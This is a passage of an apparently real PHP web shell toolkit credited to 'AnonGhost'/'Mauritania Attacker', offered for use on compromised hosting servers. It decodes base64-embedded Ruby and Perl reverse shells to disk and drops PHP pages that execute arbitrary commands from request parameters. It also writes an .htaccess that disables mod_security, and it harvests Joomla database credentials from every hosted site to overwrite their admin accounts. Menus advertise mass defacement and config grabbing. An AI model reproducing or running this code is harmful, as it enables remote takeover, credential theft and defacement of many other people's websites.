iXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbmQNCiAgICAgICAgICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICAgICAgICAgIGVuZA0KICAgICAgICByZXNjdWUgZXJyb3JCcm8NCiAgICAgICAgICAgICAgICBwdXRzICIqKiogI3tuYW1lfToje3BvcnR9IGRpc2Nvbm5lY3RlZCINCiAgICAgICAgZW5zdXJlDQogICAgICAgICAgICAgICAgcy5jbG9zZQ0KICAgICAgICAgICAgICAgIHMgPSBuaWwNCiAgICAgICAgZW5kDQplbHNlDQogICAgICAgIHVzYWdlDQogICAgICAgIGV4aXQNCmVuZA=='; $cvcvcv = fopen("revbackk.rb" ,"w+"); $write = fwrite ($cvcvcv ,base64_decode($vkffhd)); fclose($cvcvcv); chmod("revbackk.rb",0755); //extract php command shell $merdeeeee = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBSdWJ5IEJhY2sgQ29ubmVjdCBTaGVsbDwvdGl0bGU+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3MTQuMHp6MC5jb20vMjAxNC8wNi8wNC8yMS8zOTY1NTQzOTQucG5nIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQtY29sb3I6ICMyMjIyMjIgIWltcG9ydGFudDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7fSAgICAgIGF7dGV4dC1kZWNvcmF0aW9uOm5vbmU7IGZvbnQtZmFtaWx5OiBUYWhvbWEsIEdlbmV2YTsgY29sb3I6IzAwNzcwMDsgcGFkZGluZzoycHggMnB4O30gICAgICBhOmhvdmVye2NvbG9yOiMwMDk5MDA7IHRleHQtc2hhZG93OiMwMGZmMDAgMHB4IDBweCAzcHg7fQkgIC5hcmVhIHsgY29sb3I6ICMwMGJiMDA7IGZvbnQtc2l6ZTogOXB0OyB0ZXh0LXNoYWRvdzojMDAwMDAwIDBweCAycHggN3B4OyBib3JkZXI6IHNvbGlkIDBweCAjMDA3NzAwOyBiYWNrZ3JvdW5kLWNvbG9yOnRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA5OTAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDAsMTE5LDApIDBweCAwcHggNHB4OyB9CSAgaW5wdXRbdHlwZT1zdWJtaXRdeyBwYWRkaW5nOiAzcHg7IGNvbG9yOiAjMDA3NzA7ICBmb250LXdlaWdodDogYm9sZDsgdGV4dC1hbGlnbjogY2VudGVyOyAgdGV4dC1zaGFkb3c6IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC4zKTsgIGJhY2tncm91bmQ6ICNhZWFlYWU7ICBiYWNrZ3JvdW5kLWNsaXA6IHBhZGRpbmctYm94OyAgYm9yZGVyOiAxcHggc29saWQgIzI4NDQ3MzsgIGJvcmRlci1ib3R0b20tY29sb3I6ICMyMjNiNjY7ICBib3JkZXItcmFkaXVzOiA0cHg7ICBjdXJzb3I6IHBvaW50ZXI7ICBiYWNrZ3JvdW5kLWltYWdlOi13ZWJraXQtbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtbW96LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW8tbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiBsaW5lYXItZ3JhZGllbnQodG8gYm90dG9tLCAjZWFlYWVhLCAjZDBkMGQwKTsgIC13ZWJraXQtYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7ICBib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgfSBpbnB1dFt0eXBlPXRleHRdeyBwYWRkaW5nOiAzcHg7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzogIzc3Nzc3NyAwcHggMHB4IDNweDsgYm9yZGVyOiAxcHggc29saWQgIzAwNzcwMDsgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDc3MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDt9IGlucHV0W3R5cGU9c3VibWl0XTpob3ZlciwgaW5wdXRbdHlwZT10ZXh0XTpob3ZlcnsgY29sb3I6ICNmZmZmZmY7IHRleHQtc2hhZG93OiAjMDA2NjAwIDBweCAwcHggNHB4OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSBzZWxlY3R7IHBhZGRpbmc6IDNweDsgd2lkdGg6IDE2MnB4OyBjb2xvcjogIzAwYWEwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiAxcHggc29saWQgIzAwNzcwMDsgYmFja2dyb3VuZDogdHJhbnNwYXJlbnQ7IHRleHQtZGVjb3JhdGlvbjogbm9uZTsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwYWEwMDsgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoODUsIDg1LCA4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsIDg1LCA4NSkgMHB4IDBweCA0cHg7fSBzZWxlY3Q6aG92ZXJ7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7ICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gICAjY29tbWFuZHN7IG1hcmdpbi1sZWZ0OiAzNTBweDsgbWFyZ2luLXJpZ2h0OiAzNTBweDsgfSBvcHRpb257IGNvbG9yOiAjNzc3Nzc3OyB9PC9zdHlsZT4NCjw/cGhwDQplY2hvICc8YnI+PGNlbnRlcj48Yj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMXB0Ij5Db21tYW5kOiBydWJ5ICcuZ2V0Y3dkKCkuJy9yZXZiYWNray5yYiBwb3J0IGhvc3Q8L2ZvbnQ+PC9iPjxjZW50ZXI+PGJyPic7DQplY2hvICc8Zm9udCBmYWNlPSJUYWhvbWEiIGFsaWduPSJjZW50ZXIiIHNpemU9IjIiIGNvbG9yPSJncmVlbiI+IENvZGVkIEJ5IE1hdXJpdGFuaWEgQXR0YWNrZXIgPC9mb250Pic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiA8aW1nIHNyYz0iaHR0cHM6Ly93d3ctdHJvcG8tY29tLnMzLmFtYXpvbmF3cy5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTAvMDgvcnVieS1sb2dvLTUxMjEucG5nIiAgd2lkdGg9IjE3NCIgaGVpZ2h0PSIyMDAiID48L3A+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHJ1YnkgaXMgbm90IGVuYWJsZWQgaW4gdGhpcyBzZXJ2ZXIgOig8L2ZvbnQ+PC9jZW50ZXI+PC9wPg0KPHAgYWxpZ249ImNlbnRlciI+DQo8Zm9udCBmYWNlPSJHZW5ldmEiIGFsaWduPSJjZW50ZXIiIHNpemU9IjMiIGNvbG9yPSIjMDA5OTAwIj5Db21tYW5kOiBydWJ5ICcuZ2V0Y3dkKCkuJy9yZXZiYWNray5yYiBwb3J0IGhvc3Q8L2ZvbnQ+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+'; $file = fopen("rubbbber.php" ,"w+"); $write = fwrite ($file ,base64_decode($merdeeeee)); fclose($file); echo "
Ruby Back Connect Shell

"; } if(isset($_GET['action']) && $_GET['action'] == 'prlbckacnonect'){ echo '
MySQL & PostgreSql Connect - Command Execution - Base64 Command - Config Grabber - Subdomain Checker - Joomla Reverse Server - Wordpress Reverse Server - Find Directory Writable/Readable - Zone-h Notifier - Shtml Command Shell - Back connect Simple - Ruby BackConnect - Perl BackConnect - Python BackConnect - Exploit - Whcms Killer - Webmail Password Changer - Wordpress Csrf Exploit
'; mkdir('Backperlrev', 0755); chdir('Backperlrev'); $kokwkwkwkwkw = ".htaccess"; $wkwkwkwkw_adi = "$kokwkwkwkwkw"; $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw açılamadı!"); $zilzil = " SecFilterEngine Off SecFilterScanPOST Off "; fwrite ( $wkwkwkwkw , $zilzil ) ; fclose ($wkwkwkwkw); $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw=='; $zerer = fopen("reverse.pl" ,"w+"); $write = fwrite ($zerer ,base64_decode($shellololol)); fclose($zerer); chmod("reverse.pl",0755); //extract php command shell $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyICFpbXBvcnRhbnQ7IGNvbG9yOiAjMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4O30gICAgICBhe3RleHQtZGVjb3JhdGlvbjpub25lOyBmb250LWZhbWlseTogVGFob21hLCBHZW5ldmE7IGNvbG9yOiMwMDc3MDA7IHBhZGRpbmc6MnB4IDJweDt9ICAgICAgYTpob3Zlcntjb2xvcjojMDA5OTAwOyB0ZXh0LXNoYWRvdzojMDBmZjAwIDBweCAwcHggM3B4O30JICAuYXJlYSB7IGNvbG9yOiAjMDBiYjAwOyBmb250LXNpemU6IDlwdDsgdGV4dC1zaGFkb3c6IzAwMDAwMCAwcHggMnB4IDdweDsgYm9yZGVyOiBzb2xpZCAwcHggIzAwNzcwMDsgYmFja2dyb3VuZC1jb2xvcjp0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwOTkwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYigwLDExOSwwKSAwcHggMHB4IDRweDsgfQkgIGlucHV0W3R5cGU9c3VibWl0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwNzcwOyAgZm9udC13ZWlnaHQ6IGJvbGQ7IHRleHQtYWxpZ246IGNlbnRlcjsgIHRleHQtc2hhZG93OiAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuMyk7ICBiYWNrZ3JvdW5kOiAjYWVhZWFlOyAgYmFja2dyb3VuZC1jbGlwOiBwYWRkaW5nLWJveDsgIGJvcmRlcjogMXB4IHNvbGlkICMyODQ0NzM7ICBib3JkZXItYm90dG9tLWNvbG9yOiAjMjIzYjY2OyAgYm9yZGVyLXJhZGl1czogNHB4OyAgY3Vyc29yOiBwb2ludGVyOyAgYmFja2dyb3VuZC1pbWFnZTotd2Via2l0LWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogLW1vei1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1vLWxpbmVhci1ncmFkaWVudCh0b3AsICNlYWVhZWEsICNkMGQwZDApOyAgYmFja2dyb3VuZC1pbWFnZTogbGluZWFyLWdyYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMXB0Ij5Vc2FnZTogcmV2ZXJzZS5wbCBbSG9zdF0gW1BvcnRdPC9mb250Pjxicj4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vd3d3OS4wenowLmNvbS8yMDE0LzA4LzIwLzE5LzQ3MDA3MTkzOS5wbmciPjwvcD48Zm9udCBmYWNlPSJHZW5ldmEiIGFsaWduPSJjZW50ZXIiIHNpemU9IjIiIGNvbG9yPSIjMDA3NzAwIj4gQ29kZWQgQnkgTWF1cml0YW5pYSBBdHRhY2tlciA8L2ZvbnQ+PGJyPg0KPGZvcm0gbWV0aG9kPWdldCBhY3Rpb249IicuJG1lLiciPg0KPHRleHRhcmVhIGNsYXNzPSJhcmVhIiByb3dzPSIxMyIgbmFtZT0iUzEiIGNvbHM9IjcwIiA+JzsNCg0KaWYgKHN0cmxlbigkX0dFVFsnY29tbWFuZCddKT4xICYmICRfR0VUWydleGVjbWV0aG9kJ10hPSJwb3BlbiIpew0KZWNobyAkX0dFVFsnZXhlY21ldGhvZCddKCRfR0VUWydjb21tYW5kJ10pO30NCmlmIChzdHJsZW4oJF9QT1NUWydjb21tYW5kJ10pPjEgJiYgJF9QT1NUWydleGVjbWV0aG9kJ10hPSJwb3BlbiIpew0KZWNobyAkX1BPU1RbJ2V4ZWNtZXRob2QnXSgkX1BPU1RbJ2NvbW1hbmQnXSk7fQ0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXT09InBvcGVuIil7DQpwb3BlbigkX0dFVFsnY29tbWFuZCddLCJyIik7fQ0KDQplY2hvJzwvdGV4dGFyZWE+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHBlcmwgaXMgbm90IGVuYWJsZWQgaW4gdGhpcyBzZXJ2ZXIgOig8L2NlbnRlcj48L3A+DQo8cCBhbGlnbj0iY2VudGVyIj48c3Ryb25nPkNvbW1hbmQ6IHBlcmwgcmV2ZXJzZS5wbCB5b3VySVAgUG9ydDwvc3Ryb25nPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPSJ2dyIgc2l6ZT0iNTAiIHZhbHVlPSJjbWQiPiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iY29tbWFuZCIgc2l6ZT0iNDMiPiA8c2VsZWN0IG5hbWU9ZXhlY21ldGhvZD4NCjxvcHRpb24gdmFsdWU9InN5c3RlbSI+U3lzdGVtPC9vcHRpb24+ICA8b3B0aW9uIHZhbHVlPSJleGVjIj5FeGVjPC9vcHRpb24+ICA8b3B0aW9uIHZhbHVlPSJwYXNzdGhydSI+UGFzc3RocnU8L29wdGlvbj48b3B0aW9uIHZhbHVlPSJwb3BlbiI+cG9wZW48L29wdGlvbj4NCjwvc2VsZWN0PiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlY3V0ZSI+DQo8L3A+PC9mb3JtPic7DQo/Pg=='; $file = fopen("kit.php" ,"w+"); $write = fwrite ($file ,base64_decode($zonop)); fclose($file); echo "
Perl Connect Shell Priv8

"; } if(isset($_GET['action']) && $_GET['action'] == 'joomla'){ echo '
Mass Deface Dirs - Mass Change Admin Joomla - Mass Change Admin vBulletin - Mass Change Admin WordPress - Wordpress & Joomla Mass Deface - Wordpress Index Hijack Priv8 - Joomla Index Changer - Wordpress Index Changer - Cpanel & Ftp Auto Defacer
'; echo '
Mass Change Admin Joomla

'; if(isset($_POST['s'])){ $file = @file_get_contents('joomla.txt'); $ex = explode("\n",$file); echo "
"; flush(); foreach ($ex as $exp){ $es = explode("||",$exp); $config = $es[0]; $domin = $es[1]; $domins = trim($domin).''; $readconfig = @file_get_contents(trim($config)); if(ereg('JConfig',$readconfig)){ $pass = ex($readconfig,'$password = \'',"';"); $userdb = ex($readconfig,'$user = \'',"';"); $db = ex($readconfig,'$db = \'',"';"); $fix = ex($readconfig,'$dbprefix = \'',"';"); $tab = $fix.'users'; $con = @mysql_connect('localhost',$userdb,$pass); $db = @mysql_select_db($db,$con); $query = @mysql_query("UPDATE `$tab` SET `username` ='virusa'"); $query3 = @mysql_query("UPDATE `$tab` SET `password` ='0a3329119bf465dce95057a37ec91152:TL1fIDogLJU4bHHcgQWETu8GN67fUd8'"); if ($query and $query3 ){$r = 'Succeed user [virusa] pass [worm]';}else{$r = 'failed';} $domins = trim($domin).''; echo ""; flush(); }else{ echo ""; flush(); } } die(); } if(!is_file('named.txt')){ $d00m = @file("/etc/named.conf"); flush(); }else{ $d00m = file("named.txt"); } if(!$d00m) { die (""); } else { echo "

Domains Configs Result
".$r."
failed
"; $f = fopen('joomla.txt','w'); foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domvw); if(strlen(trim($domvw[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domvw[1][0])); $wpl=$pageURL."/sim/rut/home/".$user['name']."/public_html/configuration.php"; $wpp=get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sim/rut/home/".$user['name']."/public_html/blog/configuration.php"; $wpp2=get_headers($wp2); $wp12=$wpp2[0]; $wp3=$pageURL."/sim/rut/home/".$user['name']."/public_html/joomla/configuration.php"; $wpp3=get_headers($wp3); $wp13=$wpp3[0]; $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config= $wpl; } elseif (strpos($wp12, "200") == true) { $config= $wp2; } elseif (strpos($wp13, "200") == true) { $config= $wp3; } else { continue; } flush(); $dom = $domvw[1][0]; $w = fwrite($f,"$config||$dom \n"); if($w){$r = 'Save';}else{$r = 'failed';} echo ""; flush(); } } } } echo "
Domains Config Result
".$r."


"; } if(isset($_GET['action']) && $_GET['action'] == 'wp'){ echo '
